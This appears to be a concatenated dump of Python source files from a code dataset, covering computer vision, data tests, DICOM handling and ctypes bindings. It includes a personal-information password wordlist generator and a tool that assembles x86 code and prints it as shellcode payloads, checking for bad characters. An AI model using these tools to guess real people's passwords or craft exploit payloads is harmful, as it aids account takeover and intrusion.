headers=headers)\nprint(resp)\nprint(resp.text)\n","sub_path":"week02/shimo_login/shimo_login_by_request.py","file_name":"shimo_login_by_request.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"554575711","text":"import random\nfrom colorama import Fore\nfrom itertools import product\nFirst = input(Fore.GREEN + \"First name: \")\nSur = input(\"Surname: \")\nAge = input(\"Age: \")\nAddress = input(\"Address: \")\nSpec = input(\"Special character(s): \")\ndef allwords(chars, length):\n\tfor letters in product(chars, repeat=length):\n\t\tyield ''.join(letters)\ndef main():\n\tletters = First + Sur + Age + Address + Spec\n\tfor wordlen in range(7, 40):\n\t\tfor word in allwords(letters, wordlen):\n\t\t\tprint(word)\nif __name__==\"__main__\":\n\tmain()\n","sub_path":"wordlistmaker.py","file_name":"wordlistmaker.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"156704942","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom src.com.cv.DetectObject.HistogramOfOrientedGradients.NonMaxSuppression.fast.non_max_suppression_fast import \\\n non_max_suppression_fast\n\n# load the image\nimage_path = \"../images/\"\noriginal_image = cv2.imread(image_path + \"example_02.jpg\")\n# show original image\nwindow_name = 'Original Image'\ncv2.imshow(window_name, original_image)\ncv2.waitKey()\n\n# example_01\n# startX, startY, endX, endY\n# boundingBoxes = np.array([\n# (12, 84, 140, 212),\n# (24, 84, 152, 212),\n# (36, 84, 164, 212),\n# (12, 96, 140, 224),\n# (24, 96, 152, 224),\n# (24, 108, 152, 236)])\n\n# example_02\n# startX, startY, endX, endY\nboundingBoxes = np.array([\n (114, 60, 178, 124),\n (120, 60, 184, 124),\n (114, 66, 178, 130)])\n\n# example_03\n# startX, startY, endX, endY\n# boundingBoxes = np.array([\n# (12, 30, 76, 94),\n# (12, 36, 76, 100),\n# (72, 36, 200, 164),\n# (84, 48, 212, 176)])\n\n# clone original image\nbefore_perform_non_max_suppression = original_image.copy()\nprint(\"Before applying non-maximum: %d bounding boxes\" % (len(boundingBoxes)))\n# draw bounding boxes\ncolors = ((0, 0, 255), (240, 0, 159), (0, 165, 255), (255, 255, 0), (255, 0, 255), (255, 0, 0))\nfor ((startX, startY, endX, endY), color) in zip(boundingBoxes, colors):\n cv2.rectangle(before_perform_non_max_suppression, (startX, startY), (endX, endY), color, 2)\n\n# clone original image\nafter_perform_non_max_suppression = original_image.copy()\n# perform non-maximum suppression on the bounding boxes\nkeeping_boundingBoxes = non_max_suppression_fast(boundingBoxes, 0.3)\nprint(\"After applying non-maximum: %d bounding boxes\" % (len(keeping_boundingBoxes)))\n# draw bounding boxes\nfor (startX, startY, endX, endY) in keeping_boundingBoxes:\n cv2.rectangle(after_perform_non_max_suppression, (startX, startY), (endX, endY), (0, 255, 0), 2)\n\n# show Result\nfig = plt.figure(\"Result\")\nimages = (\"Before\", before_perform_non_max_suppression), \\\n (\"After \", after_perform_non_max_suppression)\nfor (i, (name, image)) in enumerate(images):\n ax = fig.add_subplot(1, 2, i + 1)\n ax.set_title(name)\n plt.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n plt.axis(\"off\")\n# show the figure\nplt.show()\n","sub_path":"src/com/cv/DetectObject/HistogramOfOrientedGradients/NonMaxSuppression/fast/Example.py","file_name":"Example.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"106956447","text":"from tools.testing import Test, TestError\n\n@Test.wrap\ndef not_null(df, ignore=[]):\n \"\"\"True if a Pandas.DataFrame doesn't contain any null values\"\"\"\n columns = [col for col in df if col not in ignore]\n return df[columns].notnull().all().all()\n\n@Test.wrap\ndef unique_column(df, column):\n \"\"\"True if a Pandas.DataFrame has a single value for a given column\"\"\"\n if column not in df.columns:\n raise TestError(f\"DataFrame doesn't have a `{column}` column\")\n return len(df[column].unique()) == 1\n\n@Test.wrap\ndef no_duplicates(df):\n \"\"\"True if the Pandas.DataFrame doesn't contain duplicate rows\"\"\"\n return not df.duplicated().any()\n\n@Test.wrap\ndef contains_column(df, column):\n \"\"\" True if the dataframe contains the column\"\"\"\n return column in df.columns\n\n@Test.wrap\ndef prevalence_under_1(df):\n \"\"\" True if the Pandas.DataFrame has means under 1 for prevalence measures\"\"\"\n if \"mean\" not in df.columns or \"measure_id\" not in df.columns:\n raise TestError(\"DataFrame is missing a mean or measure_id column\")\n return (df.loc[df.measure_id == 5, \"mean\"] <= 1).all()\n\n@Test.wrap\ndef lower_less_than_mean(df):\n \"\"\" True if the Pandas.DataFrame has a lower less than the mean\"\"\"\n if \"mean\" not in df.columns or \"lower\" not in df.columns:\n raise TestError(\"DataFrame doesn't have a mean or lower column\")\n return (df[\"lower\"] <= df[\"mean\"]).all()\n\n@Test.wrap\ndef upper_greater_than_mean(df):\n \"\"\" True if the Pandas.DataFrame has an upper greater than the mean\"\"\"\n if \"mean\" not in df.columns or \"upper\" not in df.columns:\n raise TestError(\"DataFrame doesn't have a mean or upper column\")\n return (df[\"upper\"] >= df[\"mean\"]).all()\n\n\n@Test.wrap\ndef _upload_columns_test(df):\n \"\"\"True if the Pandas.DataFrame contains all the columns needed to upload to the DB\"\"\"\n required_columnms = ['bundle_id',\n 'merged_nid',\n 'estimate_id',\n 'location_id',\n 'sex_id',\n 'year_start',\n 'year_end',\n 'age_group_id',\n 'measure_id',\n 'source_type_id',\n 'representative_id',\n 'uncertainty_type_id',\n 'uncertainty_type_value',\n 'mean',\n 'lower',\n 'upper',\n 'standard_error',\n 'effective_sample_size',\n 'sample_size',\n 'cases']\n \n for column in required_columnms:\n if column not in df:\n return False\n return True\n","sub_path":"gbd_2019/nonfatal_code/clinical_team/Upload/tools/tests/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"23921767","text":"import os\nimport pydicom\nimport numpy as np\nfrom PIL import Image as pillow\n\nfrom utils import mkdir\n\nall_uploads = os.path.join('static', 'uploads')\nimages_dir = os.path.join(all_uploads, 'images')\nthumbnails_dir = os.path.join(all_uploads, 'thumbnails')\n\nthumbnail_size = (256,256)\n\ndef normalize_and_scale(image_as_np):#I took this function from code I wrote for my current Simons Foundation Fellowship\n\n #potential improvement is to account for the zero case, where min-max = 0 \n #however, this is unlikely for most DICOM images\n\n int_range = float(image_as_np.max()-image_as_np.min())\n norm_image = (image_as_np - image_as_np.min()) / int_range\n \n return (255. * norm_image).astype(np.uint8) #scale values (prior: logistic function) from 0 to 255\n\ndef read_dicom(filename):#this is just a wrapper function to be used as a util \n return pydicom.read_file(filename)\n\n\ndef make_thumbnail(raw_read, file_in):\n pixels = raw_read.pixel_array #this is a numpy array\n norm_pixels = normalize_and_scale(pixels)\n\n img = pillow.fromarray(norm_pixels)\n\n\n mkdir(images_dir)\n img_name = '{}.png'.format(file_in)\n img_path = os.path.join(images_dir, img_name)\n img.save(img_path, 'JPEG')\n\n img.thumbnail(thumbnail_size)\n\n mkdir(thumbnails_dir)\n file_out = os.path.join(thumbnails_dir, img_name)\n\n img.save(file_out, 'JPEG')\n\n return img_name\n \n\n","sub_path":"dicom.py","file_name":"dicom.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"581009130","text":"\nfrom treys.card import Card\n\n\nclass Evaluator(object):\n\n SPADES_QUEEN = Card.new('Qs') \n\n def __init__(self):\n pass\n \n def _calculate_score(self, cards):\n suits = [Card.get_suit_int(c) for c in cards]\n score = suits.count(Card.CHAR_SUIT_TO_INT_SUIT['h'])\n if Evaluator.SPADES_QUEEN in cards:\n score += 13\n return score\n\n def _identify_looser(self, cards, ids):\n suits = [Card.get_suit_int(c) for c in cards]\n if suits[1:].count(suits[0]) == 0:\n return ids[0]\n first_rank = Card.get_rank_int(cards[0])\n max_rank = first_rank\n max_index = 0\n number_of_cards = len(cards)\n for i in range(1, number_of_cards):\n if suits[i] == suits[0]:\n tmp_rank = Card.get_rank_int(cards[i])\n if tmp_rank > max_rank:\n max_index = i\n tmp_rank = max_rank\n return ids[max_index]\n \n def evaluate(self, cards, ids):\n return self._calculate_score(cards), self._identify_looser(cards, ids)\n\n","sub_path":"gymhearts/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"537047570","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nProgram: build_and_extract_x86_payload.py\n\nDate: 07/07/2021\n\nAuthor: Travis Phillips\n\nPurpose: This script will build a GAS source file object and extract\n its .text section and print it out as a formatted payload to\n be copied and pasted in other code.\n\"\"\"\n#######################################\n# Imports\n#######################################\nimport sys\nimport os\nimport argparse\nimport tempfile\nimport subprocess\nfrom shutil import copy\n\n#######################################\n# Application Constants\n#######################################\nTITLE = \"Build & Extract Payload\"\nVERSION = \"v1.0\"\n\n#######################################\n# Color Constants\n#######################################\nRED = \"\\033[31;1m\"\nGRN = \"\\033[32;1m\"\nYEL = \"\\033[33;1m\"\nBLU = \"\\033[34;1m\"\nNON = \"\\033[0m\"\n\n########################################################################\n# PRINTER FUNCTIONS\n########################################################################\ndef print_info(msg: str, end: str=\"\\n\"):\n \"\"\" Print an info message. \"\"\"\n print(f\" [{BLU}*{NON}] {msg}\", end=end)\n\ndef print_success(msg: str, end: str=\"\\n\"):\n \"\"\" Print a success message. \"\"\"\n print(f\" [{GRN}+{NON}] {msg}\", end=end)\n\ndef print_error(msg: str, end: str=\"\\n\"):\n \"\"\" Print a failure message. \"\"\"\n print(f\" [{RED}-{NON}] \\033[31;1mERROR:{NON} {msg}\", end=end)\n\ndef print_key_val(key: str, val: str, end: str=\"\\n\"):\n \"\"\" Print a failure message. \"\"\"\n print(f\"{YEL}{key.rjust(23)}:{NON} {val}\", end=end)\n\ndef format_bool(val: bool) -> str:\n \"\"\" Format bools for metadata output \"\"\"\n if val:\n return f\"{RED}TRUE{NON}\"\n return f\"{GRN}FALSE{NON}\"\n\ndef print_c_payload(payload: bytes, buf: str, args: argparse.Namespace):\n \"\"\" Formats the payload output for C code. \"\"\"\n fmt = \"/////////////////////////////////////////////////////\\n\"\n fmt += f\"// source file: {os.path.basename(args.src_file)}\\n\"\n fmt += f\"// payload size: {len(payload)}\\n\"\n fmt += \"/////////////////////////////////////////////////////\\n\\n\"\n fmt += \"char payload[] = \"\n i = 0\n padding = \"\"\n while i < len(buf):\n if i > 0:\n padding = \" \"\n if len(buf) - i >= 64:\n fmt += f\"{padding}\\\"{buf[i:i+64]}\\\"\\n\"\n else:\n fmt += f\"{padding}\\\"{buf[i:]}\\\"\\n\"\n i += 64\n fmt = f\"{fmt[:-1]};\\n\"\n print(fmt)\n\ndef print_python_payload(payload: bytes, buf: str, args: argparse.Namespace):\n \"\"\" Formats the payload output for python code. \"\"\"\n fmt = \"#################################################\\n\"\n fmt += f\"# source file: {os.path.basename(args.src_file)}\\n\"\n fmt += f\"# payload size: {len(payload)}\\n\"\n fmt += \"#################################################\\n\\n\"\n i = 0\n while i < len(buf):\n if i == 0:\n fmt += \"payload = \"\n else:\n fmt += \"payload += \"\n if len(buf) - i >= 64:\n fmt += f\"\\\"{buf[i:i+64]}\\\"\\n\"\n else:\n fmt += f\"\\\"{buf[i:]}\\\"\\n\"\n i += 64\n print(fmt)\n\ndef print_payload_metadata(payload: bytes):\n \"\"\" Prints additional information about the payload. \"\"\"\n contains_nulls = b\"\\x00\" in payload\n contains_tabs = b\"\\x09\" in payload\n contains_lf = b\"\\x0a\" in payload\n contains_cr = b\"\\x0d\" in payload\n contains_spaces = b\"\\x20\" in payload\n contains_signed = False\n for char in payload:\n if char >= 128:\n contains_signed = True\n break\n print(f\"\\t{YEL}--==[ Payload Metadata ]==--{NON}\\n\")\n print_key_val(\"Size\", len(payload))\n print_key_val(\"Contains Nulls\", format_bool(contains_nulls))\n print_key_val(\"Contains CR\", format_bool(contains_cr))\n print_key_val(\"Contains LF\", format_bool(contains_lf))\n print_key_val(\"Contains Spaces\", format_bool(contains_spaces))\n print_key_val(\"Contains Tabs\", format_bool(contains_tabs))\n print_key_val(\"Contains Signed Chars\", format_bool(contains_signed))\n\n print(\"\")\n\ndef print_payload_data(payload: bytes, args: argparse.Namespace):\n \"\"\"\n Pretty printer function for the payload. This will collect some\n basic data regarding the payload such as size and if contains nulls,\n spaces, newlines, carriage returns and prints this information before\n printing a backslash-x style hex encoded string of the payload.\n \"\"\"\n print_payload_metadata(payload)\n # Hex-encode the string.\n buf = \"\"\n for char in payload:\n buf += f\"\\\\x{char:02x}\"\n\n # Print out the payload.\n print(f\"\\t{YEL}--==[ Payload Dump ]==--{NON}\\n\")\n if args.style.lower() == \"c\":\n print_c_payload(payload, buf, args)\n elif args.style.lower() == \"python\":\n print_python_payload(payload, buf, args)\n else:\n print(buf)\n\n########################################################################\n# SANITY FUNCTIONS\n########################################################################\ndef which(binary: str) -> str:\n \"\"\"\n This function is designed to emulate the Linux which command. It\n will grab the PATH environment variable and step through each path\n and look for the target binary. If found it will ensure that it\n is marked with the execute permission. If so it will return the\n full path to that binary, otherwise it will keep search. If not\n found, None will be returned.\n \"\"\"\n for path in os.getenv('PATH').split(os.path.pathsep):\n needle = os.path.join(path, binary)\n if os.path.exists(needle) and os.access(needle, os.X_OK):\n return needle\n return \"\"\n\ndef sane_environment() -> bool:\n \"\"\"\n Performs sanity checks of the build environment and ensures we have\n the required tools.\n \"\"\"\n requirements = ['as', 'objcopy']\n for target in requirements:\n print_info(f\"Checking {YEL}{target}{NON} is installed: \", end=\"\")\n if not which(target):\n print(f\"{RED}NOT FOUND{NON}\")\n return False\n print(f\"{GRN}FOUND{NON}\")\n\n return True\n\n########################################################################\n# BUILD & EXTRACT FUNCTIONS\n########################################################################\ndef build_and_extract_payload(src_path: str) -> bytes:\n \"\"\"\n Builds the src file in the temp directory and attempts to extract\n the .text section of the binary as a raw binary array.\n \"\"\"\n # Create a temp directory.\n dirpath = tempfile.mkdtemp()\n print_info(\"Compiling and extracting payload...\")\n\n # Set some path variables for convinence.\n base_name = os.path.basename(src_path)\n src_tmp_path = os.path.join(dirpath, base_name)\n obj_tmp_path = os.path.join(dirpath, f\"{base_name[:-2]}.o\")\n payload_tmp_path = os.path.join(dirpath, \"payload.bin\")\n\n # Copy the Source code file to the directory.\n copy(src_path, dirpath)\n\n # Build the binary object using GAS.\n cmd = []\n cmd.append(which('as'))\n cmd.append('--march=i386')\n cmd.append('--32')\n cmd.append(src_tmp_path)\n cmd.append('-o')\n cmd.append(obj_tmp_path)\n\n # Check that the object file was created or abort.\n if execute_command(cmd) != 0 or not os.path.exists(obj_tmp_path):\n print_error(\"Compilation failed, object file was not created.\")\n sys.exit(4)\n\n # Use objcopy to extract the .text section of the object.\n cmd = []\n cmd.append(which('objcopy'))\n cmd.append('-j')\n cmd.append('.text')\n cmd.append('-O')\n cmd.append('binary')\n cmd.append(obj_tmp_path)\n cmd.append(payload_tmp_path)\n execute_command(cmd)\n\n # Check that the payload file was created or abort.\n if execute_command(cmd) != 0 or not os.path.exists(payload_tmp_path):\n print_error(\"Objcopy failed, payload file was not created.\")\n sys.exit(5)\n\n # open and extract the payload contents.\n with open(payload_tmp_path, 'rb') as fil:\n payload = fil.read()\n\n # Check that the payload has some sort of size or abort.\n if len(payload) == 0:\n print_error(\"Payload extraction failed, Payload was zero bytes.\")\n sys.exit(6)\n\n # otherwise, return the extracted payload.\n print_success(\"\\033[32;1mPayload extraction complete!\\033[0m\\n\")\n return payload\n\ndef execute_command(cmd: list) -> int:\n \"\"\"\n Use subprocess.Popen() to execute a command and return it's exit\n code.\n \"\"\"\n try:\n proc = subprocess.Popen(cmd)\n exitcode = proc.wait()\n except OSError:\n print_error(f\"Unable to execute build command {cmd[0]}\")\n sys.exit(3)\n return exitcode\n\ndef parse_arguments() -> argparse.Namespace:\n \"\"\" Configure argparse and get arguments. \"\"\"\n desc = \"This tool will build and extract a GAS x86 source file and \"\n desc += \"attempt to extract a raw binary copy of the .text section \"\n desc += \"of the object it compiled and print it in a formatted manner.\"\n\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument('src_file', type=str,\n help='The target x86 GAS src file')\n\n desc = 'Format for output. Can be \"raw\", \"python\", or \"c\". Default is \"raw\"'\n parser.add_argument('--style', '-s', type=str, default=\"raw\",\n help=desc)\n\n # If the user provided no arguments, just print the help screen.\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n args = parser.parse_args()\n\n # check that the style argument is valid.\n if args.style.lower() not in [\"raw\", \"python\", \"c\"]:\n print_error(f\"Invalid style specified: {args.style}\\n\")\n parser.print_help()\n sys.exit(1)\n\n # Check that src file path is valid.\n if not os.path.exists(args.src_file):\n print_error(\"Invalid path to source file.\\n\")\n parser.print_help()\n sys.exit(1)\n\n print_success(\"Payload extraction complete.\")\n return args\n\ndef main():\n \"\"\" Main Application Logic. \"\"\"\n # Print a banner.\n print(f\"\\n\\t{YEL}---===[ {TITLE} {VERSION} ]===---{NON}\\n\")\n\n # Get the arguments\n args = parse_arguments()\n\n # Sanity check that the tools we need are installed on the OS.\n if not sane_environment():\n return 2\n\n # Start the extraction process.\n payload = build_and_extract_payload(args.src_file)\n\n # Print out payload and metadata.\n print_payload_data(payload, args)\n\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"utils/build_and_extract_x86_payload.py","file_name":"build_and_extract_x86_payload.py","file_ext":"py","file_size_in_byte":10552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"95594629","text":"import spirit.spiritlib as spiritlib\nimport ctypes\n\n### Load Library\n_spirit = spiritlib.LoadSpiritLibrary()\n\n### Imports\nfrom spirit.scalar import scalar\nfrom spirit import system\n\nimport numpy as np\n\n### ---------------------------------- Set ----------------------------------\n\n### Set the type of Bravais lattice. Can be e.g. \"sc\" or \"bcc\"\n_Set_Bravais_Lattice = _spirit.Geometry_Set_Bravais_Lattice\n_Set_Bravais_Lattice.argtypes = [ctypes.c_void_p, ctypes.c_char_p]\n_Set_Bravais_Lattice.restype = None\ndef setBravaisLattice(p_state, lattice, idx_image=-1, idx_chain=-1):\n _Set_Bravais_Lattice(ctypes.c_void_p(p_state), ctypes.c_char_p(lattice.encode('utf-8')))\n\n### Set number of cells in bravais lattice directions a, b, c\n_Set_N_Cells = _spirit.Geometry_Set_N_Cells\n_Set_N_Cells.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_int)]\n_Set_N_Cells.restype = None\ndef setNCells(p_state, n_cells=[1, 1, 1], idx_image=-1, idx_chain=-1):\n vec3 = ctypes.c_int * 3\n _Set_N_Cells(ctypes.c_void_p(p_state), vec3(*n_cells))\n\n### Set the types of the atoms in a basis cell\n_Set_Cell_Atom_Types = _spirit.Geometry_Set_Cell_Atom_Types\n_Set_Cell_Atom_Types.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.POINTER(ctypes.c_float)]\n_Set_Cell_Atom_Types.restype = None\ndef setCellAtomTypes(p_state, atom_types, idx_image=-1, idx_chain=-1):\n n = len(atom_types)\n vec = ctypes.c_int * n\n _Set_Cell_Atom_Types(ctypes.c_void_p(p_state), ctypes.c_int(n), vec(*atom_types))\n\n### Set the bravais vectors\n_Set_Bravais_Vectors = _spirit.Geometry_Set_Bravais_Vectors\n_Set_Bravais_Vectors.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_float),\n ctypes.POINTER(ctypes.c_float), ctypes.POINTER(ctypes.c_float)]\n_Set_Bravais_Vectors.restype = None\ndef setBravaisVectors(p_state, ta=[1.0, 0.0, 0.0], tb=[0.0, 1.0, 0.0], tc=[0.0, 0.0, 1.0], idx_image=-1, idx_chain=-1):\n vec3 = ctypes.c_float * 3\n _Set_Bravais_Vectors(ctypes.c_void_p(p_state), vec3(ta), vec3(tb), vec3(tc))\n\n### Set the overall lattice constant\n_Set_Lattice_Constant = _spirit.Geometry_Set_Lattice_Constant\n_Set_Lattice_Constant.argtypes = [ctypes.c_void_p, ctypes.c_float]\n_Set_Lattice_Constant.restype = None\ndef setLatticeConstant(p_state, lattice_constant, idx_image=-1, idx_chain=-1):\n _Set_Lattice_Constant(p_state, ctypes.c_float(lattice_constant))\n\n### ---------------------------------- Get ----------------------------------\n\n### Get Bounds\n_Get_Bounds = _spirit.Geometry_Get_Bounds\n_Get_Bounds.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_float), \n ctypes.POINTER(ctypes.c_float), ctypes.c_int, ctypes.c_int]\n_Get_Bounds.restype = None\ndef Get_Bounds(p_state, idx_image=-1, idx_chain=-1):\n _min = (3*ctypes.c_float)()\n _max = (3*ctypes.c_float)()\n _Get_Bounds(ctypes.c_void_p(p_state), _min, _max, \n ctypes.c_int(idx_image), ctypes.c_int(idx_chain))\n return [_min[i] for i in range(3)], [_max[i] for i in range(3)] \n\n### Get Center\n_Get_Center = _spirit.Geometry_Get_Center\n_Get_Center.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_float), ctypes.c_int, ctypes.c_int]\n_Get_Center.restype = None\ndef Get_Center(p_state, idx_image=-1, idx_chain=-1):\n _center = (3*ctypes.c_float)()\n _Get_Center(ctypes.c_void_p(p_state), _center, ctypes.c_int(idx_image), ctypes.c_int(idx_chain))\n return [_center[i] for i in range(3)]\n\n### Get Bravais lattice type\n_Get_Bravais_Type = _spirit.Geometry_Get_Bravais_Type\n_Get_Bravais_Type.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_int]\n_Get_Bravais_Type.restype = ctypes.c_int\ndef Get_Bravais_Type(p_state, idx_image=-1, idx_chain=-1):\n return int(_Get_Bravais_Type(ctypes.c_void_p(p_state), ctypes.c_int(idx_image), \n ctypes.c_int(idx_chain)))\n\n### Get Bravais vectors\n_Get_Bravais_Vectors = _spirit.Geometry_Get_Bravais_Vectors\n_Get_Bravais_Vectors.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_float), \n ctypes.POINTER(ctypes.c_float), ctypes.POINTER(ctypes.c_float), \n ctypes.c_int, ctypes.c_int]\n_Get_Bravais_Vectors.restype = None\ndef Get_Bravais_Vectors(p_state, idx_image=-1, idx_chain=-1):\n _a = (3*ctypes.c_float)()\n _b = (3*ctypes.c_float)()\n _c = (3*ctypes.c_float)()\n _Get_Bravais_Vectors(ctypes.c_void_p(p_state), _a, _b, _c, \n ctypes.c_int(idx_image), ctypes.c_int(idx_chain))\n return [a for a in _a], [b for b in _b], [c for c in _c]\n \n### Get N Cells\n_Get_N_Cells = _spirit.Geometry_Get_N_Cells\n_Get_N_Cells.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_int), ctypes.c_int, ctypes.c_int]\n_Get_N_Cells.restype = None\ndef Get_N_Cells(p_state, idx_image=-1, idx_chain=-1):\n n_cells = (3*ctypes.c_int)()\n _Get_N_Cells(ctypes.c_void_p(p_state), n_cells, ctypes.c_int(idx_image), ctypes.c_int(idx_chain))\n return [n for n in n_cells]\n\n### Get Translation Vectors\n_Get_Translation_Vectors = _spirit.Geometry_Get_Translation_Vectors\n_Get_Translation_Vectors.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_float), \n ctypes.POINTER(ctypes.c_float), ctypes.POINTER(ctypes.c_float), \n ctypes.c_int, ctypes.c_int]\n_Get_Translation_Vectors.restype = None\ndef Get_Translation_Vectors(p_state, idx_image=-1, idx_chain=-1):\n ta = (3*ctypes.c_float)()\n tb = (3*ctypes.c_float)()\n tc = (3*ctypes.c_float)()\n _Get_Translation_Vectors(ctypes.c_void_p(p_state), ta, tb, tc, \n ctypes.c_int(idx_image), ctypes.c_int(idx_chain))\n return [a for a in ta], [b for b in tb], [c for c in tc]\n\n### Get Translation Vectors\n_Get_Dimensionality = _spirit.Geometry_Get_Dimensionality\n_Get_Dimensionality.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_int]\n_Get_Dimensionality.restype = ctypes.c_int\ndef Get_Dimensionality(p_state, idx_image=-1, idx_chain=-1):\n return int(_Get_Dimensionality(ctypes.c_void_p(p_state), ctypes.c_int(idx_image), \n ctypes.c_int(idx_chain)))\n\n### Get Pointer to Spin Positions\n# NOTE: Changing the values of the array_view one can alter the value of the data of the state\n_Get_Positions = _spirit.Geometry_Get_Positions\n_Get_Positions.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_int]\n_Get_Positions.restype = ctypes.POINTER(scalar)\ndef Get_Positions(p_state, idx_image=-1, idx_chain=-1):\n nos = system.Get_NOS(p_state, idx_image, idx_chain)\n ArrayType = scalar*3*nos\n Data = _Get_Positions(ctypes.c_void_p(p_state), \n ctypes.c_int(idx_image), ctypes.c_int(idx_chain))\n array_pointer = ctypes.cast(Data, ctypes.POINTER(ArrayType))\n array = np.frombuffer(array_pointer.contents, dtype=scalar)\n array_view = array.view()\n array_view.shape = (nos, 3)\n return array_view\n\n### Get Pointer to atom types\n# NOTE: Changing the values of the array_view one can alter the value of the data of the state\n_Get_Atom_Types = _spirit.Geometry_Get_Atom_Types\n_Get_Atom_Types.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_int]\n_Get_Atom_Types.restype = ctypes.POINTER(ctypes.c_int)\ndef Get_Atom_Types(p_state, idx_image=-1, idx_chain=-1):\n nos = system.Get_NOS(p_state, idx_image, idx_chain)\n ArrayType = ctypes.c_int*nos\n Data = _Get_Atom_Types(ctypes.c_void_p(p_state), \n ctypes.c_int(idx_image), ctypes.c_int(idx_chain))\n array_pointer = ctypes.cast(Data, ctypes.POINTER(ArrayType))\n array = np.frombuffer(array_pointer.contents, dtype=ctypes.c_int)\n array_view = array.view()\n return array_view","sub_path":"core/python/spirit/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":7838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"402530985","text":"\n\n#calss header\nclass _DUCTILE():\n\tdef __init__(self,): \n\t\tself.name = \"DUCTILE\"\n\t\tself.definitions = [u'A ductile metal can be bent easily.']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_ductile.py","file_name":"_ductile.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"114375725","text":"import numpy as np\nimport cv2\n\n\ndef buildRefTable(img):\n table = [[0 for x in range(1)] for y in range(90)] # creating a empty list\n img_center = [img.shape[0]/2, img.shape[1]/2] # r will be calculated corresponding to this point\n\n filter_size = 3\n for x in range(img.shape[0]-(filter_size-1)):\n for y in range(img.shape[1]-(filter_size-1)):\n if img[x,y] != 0:\n theta, r = findAngleDistance(x,y,img_center)\n if r != 0:\n table[np.absolute(theta)].append(r)\n\n for i in range(len(table)): table[i].pop(0)\n return table\n\n\ndef findAngleDistance(x1,y1,img_center):\n x2, y2 = img_center[0], img_center[1]\n r = [(x2-x1),(y2-y1)]\n if (x2-x1 != 0):\n return [int(np.rad2deg(np.arctan((y2-y1)/(x2-x1)))), r]\n else:\n return [0,0]\n\n\ndef findMaxima(acc):\n\n ridx,cidx = np.unravel_index(acc.argmax(),acc.shape)\n return [acc[ridx,cidx],ridx,cidx]\n\n\ndef matchTable(im, table):\n\n m, n = im.shape\n acc = np.zeros((m+50,n+50)) # Extra space as voted points for shapes can be outside the image\n\n def findGradient(x,y):\n if (x != 0):\n return int(np.rad2deg(np.arctan(y/x)))\n else:\n return 0\n\n for x in range(1,im.shape[0]):\n for y in range(im.shape[1]):\n\n if im[x,y] != 0: # boundary point\n theta = findGradient(x,y)\n vectors = table[theta]\n for vector in vectors:\n acc[vector[0]+x, vector[1]+y]+=1\n return acc\n\ndef main(template_names,actual_image_name):\n\n im = cv2.imread(actual_image_name,0)\n for img in template_names:\n refim = cv2.imread(img,0)\n\n table = buildRefTable(refim)\n acc = matchTable(im, table)\n val, ridx, cidx = findMaxima(acc)\n\n\n # code for drawing bounding-box in original image at the found location\n\n # find the half-width and height of template\n hheight = np.floor(refim.shape[0] / 2) + 1\n hwidth = np.floor(refim.shape[1] / 2) + 1\n\n # find coordinates of the box\n rstart = int(max(ridx - hheight, 1))\n rend = int(min(ridx + hheight, im.shape[0] - 1))\n cstart = int(max(cidx - hwidth, 1))\n cend = int(min(cidx + hwidth, im.shape[1] - 1))\n\n # draw the box\n im[rstart:rend, cstart] = 255\n im[rstart:rend, cend] = 255\n\n im[rstart, cstart:cend] = 255\n im[rend, cstart:cend] = 255\n\n # show the image\n cv2.imshow(\"Reference Image\",refim)\n cv2.imshow(\"Image\",im)\n\n\nif __name__ == '__main__':\n template_images = ['./GHT/templates/Input1Ref.png', './GHT/templates/Input2Ref.png']\n search_in = './GHT/actual/Input1.png'\n main(template_images,search_in)\n cv2.waitKey()\n","sub_path":"ght.py","file_name":"ght.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"485519882","text":"#!/usr/bin/env python\n# -*- coding: utf-8 